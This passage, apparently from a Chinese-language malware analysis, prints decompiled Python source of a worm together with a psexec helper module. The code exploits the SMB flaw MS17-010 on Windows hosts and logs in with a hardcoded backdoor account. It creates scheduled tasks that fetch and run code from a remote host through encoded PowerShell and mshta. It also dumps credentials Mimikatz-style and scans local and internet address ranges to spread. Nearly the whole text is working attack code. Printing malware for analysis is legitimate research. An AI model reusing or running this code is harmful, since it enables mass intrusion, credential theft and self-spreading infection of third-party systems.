+ transCommand['Data']['Pad1'] = ''
+ transCommand['Parameters']['ParameterCount'] = 0
+ transCommand['Parameters']['ParameterOffset'] = 0
+ if len(data) > 0:
+ pad2Len = (4 - fixedOffset % 4) % 4
+ transCommand['Data']['Pad2'] = '\xff' * pad2Len
+ else:
+ transCommand['Data']['Pad2'] = ''
+ pad2Len = 0
+ transCommand['Parameters']['DataCount'] = len(data)
+ transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len
+ transCommand['Parameters']['DataDisplacement'] = displacement
+ transCommand['Data']['Trans_Parameters'] = ''
+ transCommand['Data']['Trans_Data'] = data
+ pkt.addCommand(transCommand)
+ conn.sendSMB(pkt)
+
+
+def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):
+ pkt = smb.NewSMBPacket()
+ pkt['Tid'] = tid
+ command = pack('<H', setup)
+ transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
+ transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()
+ transCommand['Parameters']['MaxSetupCount'] = 1
+ transCommand['Parameters']['MaxParameterCount'] = len(param)
+ transCommand['Parameters']['MaxDataCount'] = 0
+ transCommand['Data'] = smb.SMBTransaction2_Data()
+ transCommand['Parameters']['Setup'] = command
+ transCommand['Parameters']['TotalParameterCount'] = len(param)
+ transCommand['Parameters']['TotalDataCount'] = len(data)
+ fixedOffset = 73 + len(command)
+ if len(param) > 0:
+ padLen = (4 - fixedOffset % 4) % 4
+ padBytes = '\xff' * padLen
+ transCommand['Data']['Pad1'] = padBytes
+ else:
+ transCommand['Data']['Pad1'] = ''
+ padLen = 0
+ transCommand['Parameters']['ParameterCount'] = len(param)
+ transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen
+ if len(data) > 0:
+ pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4
+ transCommand['Data']['Pad2'] = '\xff' * pad2Len
+ else:
+ transCommand['Data']['Pad2'] = ''
+ pad2Len = 0
+ transCommand['Parameters']['DataCount'] = firstDataFragmentSize
+ transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len
+ transCommand['Data']['Trans_Parameters'] = param
+ transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]
+ pkt.addCommand(transCommand)
+ conn.sendSMB(pkt)
+ conn.recvSMB()
+ i = firstDataFragmentSize
+ while i < len(data):
+ sendSize = min(4096, len(data) - i)
+ if len(data) - i <= 4096:
+ if not sendLastChunk:
+ break
+ send_trans2_second(conn, tid, data[i:i + sendSize], i)
+ i += sendSize
+
+ if sendLastChunk:
+ conn.recvSMB()
+ return i
+
+
+def createConnectionWithBigSMBFirst80(target):
+ sk = socket.create_connection((target, 445))
+ pkt = '\x00\x00' + pack('>H', 65527)
+ pkt += 'BAAD'
+ pkt += '\x00' * 124
+ sk.send(pkt)
+ return sk
+
+
+lock2 = threading.Lock()
+
+def exploit2(target, shellcode, numGroomConn):
+ global lock2
+ lock2.acquire()
+ conn = smb.SMB(target, target)
+ conn.login_standard('', '')
+ server_os = conn.get_server_os()
+ print 'Target OS: ' + server_os
+ if not (server_os.startswith('Windows 7 ') or server_os.startswith('Windows Server ') and ' 2008 ' in server_os or server_os.startswith('Windows Vista')):
+ print 'This exploit does not support this target'
+ tid = conn.tree_connect_andx('\\\\' + target + '\\' + 'IPC$')
+ progress = send_big_trans2(conn, tid, 0, feaList, '\x00' * 30, 2000, False)
+ allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 4112)
+ srvnetConn = []
+ for i in range(numGroomConn):
+ sk = createConnectionWithBigSMBFirst80(target)
+ srvnetConn.append(sk)
+
+ holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 16)
+ allocConn.get_socket().close()
+ for i in range(5):
+ sk = createConnectionWithBigSMBFirst80(target)
+ srvnetConn.append(sk)
+
+ holeConn.get_socket().close()
+ send_trans2_second(conn, tid, feaList[progress:], progress)
+ recvPkt = conn.recvSMB()
+ retStatus = recvPkt.getNTStatus()
+ if retStatus == 3221225485L:
+ print 'good response status: INVALID_PARAMETER'
+ else:
+ print ('bad response status: 0x{:08x}').format(retStatus)
+ for sk in srvnetConn:
+ sk.send(fake_recv_struct + shellcode)
+
+ for sk in srvnetConn:
+ sk.close()
+
+ conn.disconnect_tree(tid)
+ conn.logoff()
+ conn.get_socket().close()
+ time.sleep(2)
+ lock2.release()
+
+
+lock3 = threading.Lock()
+
+def exploit3(target, shellcode, numGroomConn1):
+ global lock3
+ lock3.acquire()
+ conn3 = smb.SMB(target, target)
+ conn3.login_standard('', '')
+ server_os3 = conn3.get_server_os()
+ print 'Target OS: ' + server_os3
+ if not (server_os3.startswith('Windows 7 ') or server_os3.startswith('Windows Server ') and ' 2008 ' in server_os3 or server_os3.startswith('Windows Vista')):
+ print 'This exploit does not support this target'
+ tid3 = conn3.tree_connect_andx('\\\\' + target + '\\' + 'IPC$')
+ progress3 = send_big_trans2(conn3, tid3, 0, feaList, '\x00' * 30, 2000, False)
+ allocConn3 = createSessionAllocNonPaged(target, NTFEA_SIZE - 4112)
+ srvnetConn3 = []
+ for i in range(numGroomConn1):
+ sk3 = createConnectionWithBigSMBFirst80(target)
+ srvnetConn3.append(sk3)
+
+ holeConn3 = createSessionAllocNonPaged(target, NTFEA_SIZE - 16)
+ allocConn3.get_socket().close()
+ for i in range(5):
+ sk3 = createConnectionWithBigSMBFirst80(target)
+ srvnetConn3.append(sk3)
+
+ holeConn3.get_socket().close()
+ send_trans2_second(conn3, tid3, feaList[progress3:], progress3)
+ recvPkt3 = conn3.recvSMB()
+ retStatus3 = recvPkt3.getNTStatus()
+ if retStatus3 == 3221225485L:
+ print 'good response status: INVALID_PARAMETER'
+ else:
+ print ('bad response status: 0x{:08x}').format(retStatus3)
+ for sk3 in srvnetConn3:
+ sk3.send(fake_recv_struct + shellcode)
+
+ for sk3 in srvnetConn3:
+ sk3.close()
+
+ conn3.disconnect_tree(tid3)
+ conn3.logoff()
+ conn3.get_socket().close()
+ time.sleep(2)
+ lock3.release()
+
+
+NEGOTIATE_PROTOCOL_REQUEST = binascii.unhexlify('00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200')
+SESSION_SETUP_REQUEST = binascii.unhexlify('00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000')
+TREE_CONNECT_REQUEST = binascii.unhexlify('00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00')
+NAMED_PIPE_TRANS_REQUEST = binascii.unhexlify('0000004aff534d42250000000018012800000000000000000000000000088ea3010852981000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00')
+timeout = 1
+verbose = 0
+threads_num = 255
+if 'Windows-XP' in platform.platform():
+ timeout = 1
+ threads_num = 2
+ semaphore1 = threading.BoundedSemaphore(value=2)
+ semaphore = threading.BoundedSemaphore(value=2)
+ semaphore2 = threading.BoundedSemaphore(value=2)
+else:
+ semaphore1 = threading.BoundedSemaphore(value=255)
+ semaphore = threading.BoundedSemaphore(value=threads_num)
+ semaphore2 = threading.BoundedSemaphore(value=100)
+print_lock = threading.Lock()
+
+def print_status(ip, message):
+ global print_lock
+ with print_lock:
+ print '[*] [%s] %s' % (ip, message)
+
+
+def check_ip(ip, tg):
+ global verbose
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.settimeout(float(timeout) if timeout else None)
+ host = ip
+ port = 445
+ s.connect((host, port))
+ if verbose:
+ print_status(ip, 'Sending negotiation protocol request')
+ s.send(NEGOTIATE_PROTOCOL_REQUEST)
+ negotiate_reply = s.recv(1024)
+ if len(negotiate_reply) < 36 or struct.unpack('<I', negotiate_reply[9:13])[0] != 0:
+ with print_lock:
+ print "[-] [%s] can't determine whether it's vulunerable" % ip
+ return
+ if verbose:
+ print_status(ip, 'Sending session setup request')
+ s.send(SESSION_SETUP_REQUEST)
+ session_setup_response = s.recv(1024)
+ user_id = session_setup_response[32:34]
+ if verbose:
+ print_st(ip, 'User ID = %s' % struct.unpack('<H', user_id)[0])
+ os = ''
+ word_count = ord(session_setup_response[36])
+ if word_count != 0:
+ byte_count = struct.unpack('<H', session_setup_response[43:45])[0]
+ if len(session_setup_response) != byte_count + 45:
+ print_status('invalid session setup AndX response')
+ else:
+ for i in range(46, len(session_setup_response) - 1):
+ if ord(session_setup_response[i]) == 0 and ord(session_setup_response[i + 1]) == 0:
+ os = session_setup_response[46:i].decode('utf-8')[::2]
+ break
+
+ modified_tree_connect_request = list(TREE_CONNECT_REQUEST)
+ modified_tree_connect_request[32] = user_id[0]
+ modified_tree_connect_request[33] = user_id[1]
+ modified_tree_connect_request = ('').join(modified_tree_connect_request)
+ if verbose:
+ print_status(ip, 'Sending tree connect')
+ s.send(modified_tree_connect_request)
+ tree_connect_response = s.recv(1024)
+ tree_id = tree_connect_response[28:30]
+ if verbose:
+ print_status(ip, 'Tree ID = %s' % struct.unpack('<H', tree_id)[0])
+ modified_trans2_session_setup = list(NAMED_PIPE_TRANS_REQUEST)
+ modified_trans2_session_setup[28] = tree_id[0]
+ modified_trans2_session_setup[29] = tree_id[1]
+ modified_trans2_session_setup[32] = user_id[0]
+ modified_trans2_session_setup[33] = user_id[1]
+ modified_trans2_session_setup = ('').join(modified_trans2_session_setup)
+ if verbose:
+ print_status(ip, 'Sending named pipe')
+ s.send(modified_trans2_session_setup)
+ final_response = s.recv(1024)
+ if final_response[9] == '\x05' and final_response[10] == '\x02' and final_response[11] == '\x00' and final_response[12] == '\xc0':
+ print '[+] [%s](%s) got it!' % (ip, os)
+ if 'Windows 7' in os:
+ if scan(ip, 65533) == 0:
+ print '[+] exploit...' + ip + ' win7'
+ try:
+ exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)
+ except:
+ print 'no user'
+ try:
+ exploit2(ip, sc, int(random.randint(5, 13)))
+ try:
+ print 'exp again '
+ exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)
+ except:
+ print 'no user2'
+
+ lock2.release()
+ except:
+ print '[*] maybe crash'
+ time.sleep(6)
+ try:
+ print 'exp again '
+ exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)
+ except:
+ print 'no user3'
+
+ lock2.release()
+
+ elif 'Windows Server 2008' in os:
+ if scan(ip, 65533) == 0:
+ print '[+] exploit...' + ip + ' win2k8'
+ try:
+ exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)
+ except:
+ print 'no user'
+ try:
+ exploit3(ip, sc, int(random.randint(5, 13)))
+ try:
+ print 'exp again '
+ exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)
+ except:
+ print 'no user 2'
+
+ lock3.release()
+ except:
+ print '[*] maybe crash'
+ time.sleep(6)
+ try:
+ print 'exp again '
+ exploit(ip, None, 'k8h3d', 'k8d3j9SjfS7', tg)
+ except:
+ print 'no user 3'
+
+ lock3.release()
+
+ if 'Windows 5.1' in os:
+ if scan(ip, 65533) == 0:
+ print '[+] exploit...' + ip + ' xp'
+ try:
+ exploit(ip, None, '', '', tg)
+ except:
+ print 'not succ'
+
+ elif 'Windows Server 2003' in os:
+ if scan(ip, 65533) == 0:
+ print '[+] exploit...' + ip + ' win2k3'
+ try:
+ exploit(ip, None, '', '', tg)
+ except:
+ print 'not succ'
+
+ elif scan(ip, 65533) == 0:
+ print '[+] exploit...' + ip + ' *************************other os'
+ for u in userlist:
+ for p in passlist:
+ if u == '' and p != '':
+ continue
+ try:
+ exploit(ip, None, u, p, tg)
+ except:
+ print 'exp not succ!'
+
+ else:
+ print '[-] [%s](%s) stays in safety' % (ip, os)
+ s.close()
+
+
+def check_thread(ip_address):
+ global semaphore
+ try:
+ try:
+ check_ip(ip_address, tg=1)
+ except Exception as e:
+ with print_lock:
+ tmp = 2
+
+ finally:
+ semaphore.release()
+
+
+def check_thread2(ip_address):
+ try:
+ try:
+ check_ip(ip_address, tg=2)
+ except Exception as e:
+ with print_lock:
+ tmp = 2
+
+ finally:
+ semaphore.release()
+
+
+one = 1
+try:
+ h_one = socket.socket()
+ addr = ('', 60124)
+ h_one.bind(addr)
+ one = 1
+except:
+ one = 2
+
+if one == 2:
+ print 'alredy run eb'
+ sys.exit()
+usr = subprocess.Popen('cmd /c net user&netsh advfirewall set allprofile state on&netsh advfirewall firewall add rule name=denyy445 dir=in action=block protocol=TCP localport=445', stdout=subprocess.PIPE)
+dusr = usr.stdout.read()
+if 'k8h3d' in dusr:
+ usr = subprocess.Popen('cmd /c net user k8h3d /del', stdout=subprocess.PIPE)
+dl = ''
+ee2 = ''
+if os.path.exists('c:/windows/system32/svhost.exe'):
+ dl = 'c:\\windows\\system32\\svhost.exe'
+if os.path.exists('c:/windows/SysWOW64/svhost.exe'):
+ dl = 'c:\\windows\\SysWOW64\\svhost.exe'
+if os.path.exists('c:/windows/system32/drivers/svchost.exe'):
+ dl = 'c:\\windows\\system32\\drivers\\svchost.exe'
+if os.path.exists('c:/windows/SysWOW64/drivers/svchost.exe'):
+ dl = 'c:\\windows\\SysWOW64\\drivers\\svchost.exe'
+if os.path.exists('c:/windows/temp/svvhost.exe'):
+ ee2 = 'c:\\windows\\temp\\svvhost.exe'
+if os.path.exists('c:/windows/temp/svchost.exe'):
+ ee2 = 'c:\\windows\\temp\\svchost.exe'
+if os.path.exists('C:\\windows\\system32\\WindowsPowerShell\\'):
+ usr0 = subprocess.Popen('cmd /c schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "C:\\Windows\\temp\\svchost.exe" /F', stdout=subprocess.PIPE)
+ usr1 = subprocess.Popen('cmd /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\\Microsoft\\windows\\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F', stdout=subprocess.PIPE)
+
+def mmka():
+ global domainlist
+ global passlist
+ global userlist2
+ if os.path.exists('C:\\windows\\system32\\WindowsPowerShell\\'):
+ if os.path.exists('c:/windows/temp/m.ps1'):
+ if os.path.exists('c:/windows/temp/mkatz.ini'):
+ print 'mkatz.ini exist'
+ mtime = os.path.getmtime('c:\\windows\\temp\\mkatz.ini')
+ mnow = int(time.time())
+ if (mnow - mtime) / 60 / 60 < 24:
+ musr = open('c:\\windows\\temp\\mkatz.ini', 'r').read()
+ else:
+ print 'reload mimi'
+ if 'PROGRAMFILES(X86)' in os.environ:
+ usr = subprocess.Popen('C:\\Windows\\SysNative\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass "import-module c:\\windows\\temp\\m.ps1;Invoke-Cats -pwds"', stdout=subprocess.PIPE)
+ else:
+ usr = subprocess.Popen('powershell.exe -exec bypass "import-module c:\\windows\\temp\\m.ps1;Invoke-Cats -pwds"', stdout=subprocess.PIPE)
+ musr = usr.stdout.read()
+ fmk = open('c:\\windows\\temp\\mkatz.ini', 'w')
+ fmk.write(musr)
+ fmk.close()
+ else:
+ print 'reload mimi'
+ if 'PROGRAMFILES(X86)' in os.environ:
+ usr = subprocess.Popen('C:\\Windows\\SysNative\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass "import-module c:\\windows\\temp\\m.ps1;Invoke-Cats -pwds"', stdout=subprocess.PIPE)
+ else:
+ usr = subprocess.Popen('powershell.exe -exec bypass "import-module c:\\windows\\temp\\m.ps1;Invoke-Cats -pwds"', stdout=subprocess.PIPE)
+ musr = usr.stdout.read()
+ fmk = open('c:\\windows\\temp\\mkatz.ini', 'w')
+ fmk.write(musr)
+ fmk.close()
+ else:
+ fm = open('c:\\windows\\temp\\m.ps1', 'w')
+ fm.write(mkatz)
+ fm.close()
+ if os.path.exists('c:/windows/temp/mkatz.ini'):
+ print 'mkatz.ini exist'
+ mtime = os.path.getmtime('c:\\windows\\temp\\mkatz.ini')
+ mnow = int(time.time())
+ if (mnow - mtime) / 60 / 60 < 24:
+ print 'reload mimi'
+ musr = open('c:\\windows\\temp\\mkatz.ini', 'r').read()
+ else:
+ print 'reload mimi'
+ if 'PROGRAMFILES(X86)' in os.environ:
+ usr = subprocess.Popen('C:\\Windows\\SysNative\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass "import-module c:\\windows\\temp\\m.ps1;Invoke-Cats -pwds"', stdout=subprocess.PIPE)
+ else:
+ usr = subprocess.Popen('powershell.exe -exec bypass "import-module c:\\windows\\temp\\m.ps1;Invoke-Cats -pwds"', stdout=subprocess.PIPE)
+ musr = usr.stdout.read()
+ fmk = open('c:\\windows\\temp\\mkatz.ini', 'w')
+ fmk.write(musr)
+ fmk.close()
+ else:
+ print 'reload mimi'
+ if 'PROGRAMFILES(X86)' in os.environ:
+ usr = subprocess.Popen('C:\\Windows\\SysNative\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass "import-module c:\\windows\\temp\\m.ps1;Invoke-Cats -pwds"', stdout=subprocess.PIPE)
+ else:
+ usr = subprocess.Popen('powershell.exe -exec bypass "import-module c:\\windows\\temp\\m.ps1;Invoke-Cats -pwds"', stdout=subprocess.PIPE)
+ musr = usr.stdout.read()
+ fmk = open('c:\\windows\\temp\\mkatz.ini', 'w')
+ fmk.write(musr)
+ fmk.close()
+ else:
+ usr3 = subprocess.Popen('cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"&schtasks /run /TN Autocheck)', stdout=subprocess.PIPE)
+ usr4 = subprocess.Popen('cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN Autoscan /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autoscan /tr "C:\\Windows\\temp\\svchost.exe"&schtasks /run /TN Autoscan)', stdout=subprocess.PIPE)
+ print 'mimi over'
+ usern = ''
+ lmhash = ''
+ nthash = ''
+ tspkg = ''
+ wdigest = ''
+ kerberos = ''
+ domain = ''
+ usernull = ''
+ try:
+ dousr = subprocess.Popen('cmd /c wmic ntdomain get domainname', stdout=subprocess.PIPE)
+ domianusr = dousr.stdout.read()
+ dousr = subprocess.Popen('cmd /c net user', stdout=subprocess.PIPE)
+ luser = dousr.stdout.read().split('\r\n')[:-3]
+ for c in luser:
+ if '-' in c:
+ continue
+ for j in c.split(' '):
+ if '' == j:
+ continue
+ if 'Guest' == j:
+ continue
+ userlist2.append(j.strip())
+
+ if '* LM' in musr:
+ mmlist = musr.split('* LM')
+ del mmlist[0]
+ for i in mmlist:
+ domaint = i.split('Domain :')[1].split('\n')[0].strip()
+ if domaint in domianusr:
+ domainlist.append(domaint)
+ for ii in i.split('Authentication')[0].split('Username :')[1:]:
+ unt = ii.split('\n')[0].strip()
+ userlist2.append(unt)
+
+ for ii in i.split('Authentication')[0].split('Password :')[1:]:
+ pwdt = ii.split('\n')[0].strip()
+ if pwdt != '(null)':
+ passlist.append(pwdt)
+
+ passlist = list(set(passlist))
+ userlist2 = list(set(userlist2))
+ domainlist = list(set(domainlist))
+
+ else:
+ print 'nobody logon'
+ if '* NTLM' in musr:
+ mmlist = musr.split('* NTLM')
+ del mmlist[0]
+ for i in mmlist:
+ NThash = i.split(':')[1].split('\n')[0].strip()
+ ntlist.append(NThash)
+
+ except:
+ print 'except'
+
+
+mmka()
+var = 1
+while var == 1:
+ print 'start scan'
+ if '.exe' in dl:
+ for network in find_ip():
+ print network
+ ip, cidr = network.split('/')
+ cidr = int(cidr)
+ host_bits = 32 - cidr
+ i = struct.unpack('>I', socket.inet_aton(ip))[0]
+ start = i >> host_bits << host_bits
+ end = i | (1 << host_bits) - 1
+ for i in range(start + 1, end):
+ semaphore1.acquire()
+ ip = socket.inet_ntoa(struct.pack('>I', i))
+ t1 = threading.Thread(target=scansmb, args=(ip, 445))
+ t1.start()
+
+ time.sleep(1)
+
+ print 'smb over sleep 200s'
+ time.sleep(5)
+ if 'Windows-XP' in platform.platform():
+ time.sleep(1000)
+ else:
+ print 'start scan2'
+ if '.exe' in dl:
+ for network in iplist2:
+ ip, cidr = network.split('/')
+ if ip.split('.')[0].strip() == '192':
+ continue
+ if ip.split('.')[0].strip() == '127':
+ continue
+ if ip.split('.')[0].strip() == '10':
+ continue
+ if ip.split('.')[0].strip() == '0':
+ continue
+ if ip.split('.')[0].strip() == '100':
+ continue
+ if ip.split('.')[0].strip() == '172':
+ continue
+ if int(ip.split('.')[0].strip()) in xrange(224, 256):
+ continue
+ print network
+ cidr = int(cidr)
+ host_bits = 32 - 16
+ i = struct.unpack('>I', socket.inet_aton(ip))[0]
+ start = i >> host_bits << host_bits
+ end = i | (1 << host_bits) - 1
+ for i in range(start + 1, end):
+ semaphore2.acquire()
+ ip = socket.inet_ntoa(struct.pack('>I', i))
+ t1 = threading.Thread(target=scansmb3, args=(ip, 445))
+ t1.start()
+
+ time.sleep(1)
+
+ print 'smb over sleep 200s'
+ time.sleep(5)
+ print 'eb2 internet'
+ for s in xip(500):
+ if s.split('.')[0].strip() == '127':
+ continue
+ if s.split('.')[0].strip() == '10':
+ continue
+ if s.split('.')[0].strip() == '0':
+ continue
+ if s.split('.')[0].strip() == '100':
+ continue
+ if s.split('.')[0].strip() == '172':
+ continue
+ if int(s.split('.')[0].strip()) in xrange(224, 256):
+ continue
+ print s
+ ip, cidr = s.split('/')
+ cidr = int(cidr)
+ host_bits = 32 - cidr
+ i = struct.unpack('>I', socket.inet_aton(ip))[0]
+ start = i >> host_bits << host_bits
+ end = i | (1 << host_bits) - 1
+ for i in range(start + 1, end):
+ semaphore1.acquire()
+ ip = socket.inet_ntoa(struct.pack('>I', i))
+ t1 = threading.Thread(target=scansmb2, args=(ip, 445))
+ t1.start()
+
+ time.sleep(2)
+
+ print 'eb2 over'
+ print 'sleep 10min'
+ time.sleep(5)
+ mmka()
+
+# global h_one ## Warning: Unused global
+```
+ 里面有两个不是公开的库,mysmb和psexec,其中mysmb看起来是[永恒之蓝RCE中的代码](https://github.com/0xsyr0/OSCP/blob/main/exploits/CVE-2017-0144-EternalBlue-MS17-010-RCE/mysmb.py),psexec有找到几个相似的但是没找到一样的,所以代码也放上来:
+```python
+# uncompyle6 version 3.9.2
+# Python bytecode version base 2.7 (62211)
+# Decompiled from: Python 2.7.18 (default, Jun 24 2022, 18:01:55)
+# [GCC 8.5.0 20210514 (Red Hat 8.5.0-13)]
+# Embedded file name: psexec.py
+
+import sys, os, cmd, logging
+from threading import Thread, Lock
+import argparse, random, string, time
+from impacket.examples import logger
+from impacket import version, smb
+from impacket.smbconnection import SMBConnection
+from impacket.dcerpc.v5 import transport
+from impacket.structure import Structure
+from impacket.examples import remcomsvc, serviceinstall
+
+class RemComMessage(Structure):
+ structure = (
+ ('Command', '4096s=""'),
+ ('WorkingDir', '260s=""'),
+ ('Priority', '<L=0x20'),
+ ('ProcessID', '<L=0x01'),
+ ('Machine', '260s=""'),
+ ('NoWait', '<L=0'))
+
+
+class RemComResponse(Structure):
+ structure = (
+ ('ErrorCode', '<L=0'),
+ ('ReturnCode', '<L=0'))
+
+
+RemComSTDOUT = 'RemCom_stdout'
+RemComSTDIN = 'RemCom_stdin'
+RemComSTDERR = 'RemCom_stderr'
+lock = Lock()
+
+class RemoteShell(cmd.Cmd):
+
+ def __init__(self, server, port, credentials, tid, fid, share, transport):
+ cmd.Cmd.__init__(self, False)
+ self.prompt = '\x08'
+ self.server = server
+ self.transferClient = None
+ self.tid = tid
+ self.fid = fid
+ self.credentials = credentials
+ self.share = share
+ self.port = port
+ self.transport = transport
+ return
+
+ def connect_transferClient(self):
+ self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port=self.port, preferredDialect=dialect)
+ user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
+ if self.transport.get_kerberos() is True:
+ self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)
+ else:
+ self.transferClient.login(user, passwd, domain, lm, nt)
+
+ def do_help(self, line):
+ print '\n lcd {path} - changes the current local directory to {path}\n exit - terminates the server process (and this session)\n put {src_file, dst_path} - uploads a local file to the dst_path RELATIVE to the connected share (%s)\n get {file} - downloads pathname RELATIVE to the connected share (%s) to the current local dir\n ! {cmd} - executes a local shell cmd\n' % (self.share, self.share)
+ self.send_data('\r\n', False)
+
+ def do_shell(self, s):
+ os.system(s)
+ self.send_data('\r\n')
+
+ def do_get(self, src_path):
+ try:
+ if self.transferClient is None:
+ self.connect_transferClient()
+ import ntpath
+ filename = ntpath.basename(src_path)
+ fh = open(filename, 'wb')
+ logging.info('Downloading %s\\%s' % (self.share, src_path))
+ self.transferClient.getFile(self.share, src_path, fh.write)
+ fh.close()
+ except Exception as e:
+ logging.critical(str(e))
+
+ self.send_data('\r\n')
+ return
+
+ def do_put(self, s):
+ try:
+ if self.transferClient is None:
+ self.connect_transferClient()
+ params = s.split(' ')
+ if len(params) > 1:
+ src_path = params[0]
+ dst_path = params[1]
+ elif len(params) == 1:
+ src_path = params[0]
+ dst_path = '/'
+ src_file = os.path.basename(src_path)
+ fh = open(src_path, 'rb')
+ f = dst_path + '/' + src_file
+ print '!!!!!!!!!!!!!!!!' + f
+ pathname = string.replace(f, '/', '\\')
+ logging.info('Uploading1111111111 %s to %s\\%s' % (src_file, self.share, dst_path))
+ self.transferClient.putFile(self.share, pathname.decode(sys.stdin.encoding), fh.read)
+ fh.close()
+ except Exception as e:
+ logging.error(str(e))
+
+ self.send_data('\r\n')
+ return
+
+ def do_lcd(self, s):
+ if s == '':
+ print os.getcwd()
+ else:
+ os.chdir(s)
+ self.send_data('\r\n')
+
+ def emptyline(self):
+ self.send_data('\r\n')
+
+ def default(self, line):
+ self.send_data(line.decode(sys.stdin.encoding).encode('cp437') + '\r\n')
+
+ def send_data(self, data, hideOutput=True):
+ global LastDataSent
+ if hideOutput is True:
+ LastDataSent = data
+ else:
+ LastDataSent = ''
+ self.server.writeFile(self.tid, self.fid, data)
+
+
+class Pipes(Thread):
+
+ def __init__(self, transport, pipe, permissions, share=None):
+ Thread.__init__(self)
+ self.server = 0
+ self.transport = transport
+ self.credentials = transport.get_credentials()
+ self.tid = 0
+ self.fid = 0
+ self.share = share
+ self.port = transport.get_dport()
+ self.pipe = pipe
+ self.permissions = permissions
+ self.daemon = True
+
+ def connectPipe(self):
+ try:
+ self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port=self.port, preferredDialect=dialect)
+ user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials
+ if self.transport.get_kerberos() is True:
+ self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS)
+ else:
+ self.server.login(user, passwd, domain, lm, nt)
+ self.tid = self.server.connectTree('IPC$')
+ self.server.waitNamedPipe(self.tid, self.pipe)
+ self.fid = self.server.openFile(self.tid, self.pipe, self.permissions, creationOption=64, fileAttributes=128)
+ self.server.setTimeout(1000)
+ except:
+ logging.error("Something wen't wrong connecting the pipes(%s), try again" % self.__class__)
+
+
+class RemoteStdOutPipe(Pipes):
+
+ def __init__(self, transport, pipe, permisssions):
+ Pipes.__init__(self, transport, pipe, permisssions)
+
+ def run(self):
+ global LastDataSent
+ self.connectPipe()
+ return
+ while True:
+ try:
+ ans = self.server.readFile(self.tid, self.fid, 0, 1024)
+ except:
+ pass
+ else:
+ try:
+ if ans != LastDataSent:
+ sys.stdout.write(ans.decode('cp437'))
+ sys.stdout.flush()
+ else:
+ LastDataSent = ''
+ if LastDataSent > 10:
+ LastDataSent = ''
+ except:
+ pass
+
+
+class RemoteStdErrPipe(Pipes):
+
+ def __init__(self, transport, pipe, permisssions):
+ Pipes.__init__(self, transport, pipe, permisssions)
+
+ def run(self):
+ self.connectPipe()
+ return
+ while True:
+ try:
+ ans = self.server.readFile(self.tid, self.fid, 0, 1024)
+ except:
+ pass
+ else:
+ try:
+ sys.stderr.write(str(ans))
+ sys.stderr.flush()
+ except:
+ pass
+
+
+class RemoteStdInPipe(Pipes):
+
+ def __init__(self, transport, pipe, permisssions, share=None):
+ self.shell = None
+ Pipes.__init__(self, transport, pipe, permisssions, share)
+ return
+
+ def run(self):
+ self.connectPipe()
+ return
+ self.shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share, self.transport)
+ self.shell.cmdloop()
+
+
+class StrReader:
+
+ def __init__(self, str):
+ self.__str = str
+
+ def close(self):
+ pass
+
+ def read(self, size=1024):
+ ret_str = self.__str[:size]
+ self.__str = self.__str[size:]
+ return ret_str
+
+
+class PSEXEC:
+ KNOWN_PROTOCOLS = {'445/SMB': ('ncacn_np:%s[\\pipe\\svcctl]', 445)}
+
